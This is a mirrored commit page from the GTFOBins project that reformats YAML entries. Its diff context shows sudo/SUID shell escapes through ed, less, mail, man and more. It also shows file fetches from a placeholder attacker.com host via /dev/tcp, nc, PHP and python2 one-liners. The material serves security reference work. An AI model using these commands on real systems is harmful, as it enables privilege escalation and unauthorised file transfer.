mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Fix YAMLs format
This commit is contained in:
parent
bdf78c5e99
commit
b96f6e9a49
@ -9,7 +9,7 @@ functions:
|
|||||||
sudo ed
|
sudo ed
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
suid-limited:
|
suid-limited:
|
||||||
- code: |-
|
- code: |
|
||||||
./ed
|
./ed
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
file-read:
|
file-read:
|
||||||
|
@ -29,7 +29,7 @@ functions:
|
|||||||
3<>/dev/tcp/$RHOST/$RPORT \
|
3<>/dev/tcp/$RHOST/$RPORT \
|
||||||
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
||||||
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
|
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
|
||||||
code: |-
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
export LFILE=file_to_get
|
export LFILE=file_to_get
|
||||||
|
@ -12,7 +12,7 @@ functions:
|
|||||||
sudo less /etc/profile
|
sudo less /etc/profile
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
suid-limited:
|
suid-limited:
|
||||||
- code: |-
|
- code: |
|
||||||
./less /etc/profile
|
./less /etc/profile
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
file-read:
|
file-read:
|
||||||
|
@ -9,7 +9,7 @@ functions:
|
|||||||
sudo mail -f /etc/hosts
|
sudo mail -f /etc/hosts
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
suid-limited:
|
suid-limited:
|
||||||
- code: |-
|
- code: |
|
||||||
./mail -f /etc/hosts
|
./mail -f /etc/hosts
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
---
|
---
|
||||||
|
@ -9,7 +9,7 @@ functions:
|
|||||||
sudo man man
|
sudo man man
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
suid-limited:
|
suid-limited:
|
||||||
- code: |-
|
- code: |
|
||||||
./man man
|
./man man
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
file-read:
|
file-read:
|
||||||
|
@ -9,7 +9,7 @@ functions:
|
|||||||
TERM= sudo -E more /etc/profile
|
TERM= sudo -E more /etc/profile
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
suid-limited:
|
suid-limited:
|
||||||
- code: |-
|
- code: |
|
||||||
TERM= ./more /etc/profile
|
TERM= ./more /etc/profile
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
file-read:
|
file-read:
|
||||||
|
@ -20,7 +20,7 @@ functions:
|
|||||||
^T
|
^T
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- description: After running this exit the editor to see the command output.
|
- description: After running this exit the editor to see the command output.
|
||||||
code: |-
|
code: |
|
||||||
COMMAND=id
|
COMMAND=id
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
|
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
|
||||||
|
@ -35,7 +35,7 @@ functions:
|
|||||||
php -S $LHOST:$LPORT
|
php -S $LHOST:$LPORT
|
||||||
download:
|
download:
|
||||||
- description: Fetch a remote file via HTTP GET request.
|
- description: Fetch a remote file via HTTP GET request.
|
||||||
code: |-
|
code: |
|
||||||
export URL=http://attacker.com/file_to_get
|
export URL=http://attacker.com/file_to_get
|
||||||
export LFILE=where_to_save
|
export LFILE=where_to_save
|
||||||
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
|
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
|
||||||
|
@ -20,7 +20,7 @@ functions:
|
|||||||
^T
|
^T
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- description: After running this exit the editor to see the command output.
|
- description: After running this exit the editor to see the command output.
|
||||||
code: |-
|
code: |
|
||||||
COMMAND=id
|
COMMAND=id
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
|
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
|
||||||
|
@ -18,7 +18,7 @@ functions:
|
|||||||
python2 -m SimpleHTTPServer $LPORT
|
python2 -m SimpleHTTPServer $LPORT
|
||||||
download:
|
download:
|
||||||
- description: Fetch a remote file via HTTP GET request.
|
- description: Fetch a remote file via HTTP GET request.
|
||||||
code: |-
|
code: |
|
||||||
export URL=http://attacker.com/file_to_get
|
export URL=http://attacker.com/file_to_get
|
||||||
export LFILE=where_to_save
|
export LFILE=where_to_save
|
||||||
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
|
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
|
||||||
|
Loading…
Reference in New Issue
Block a user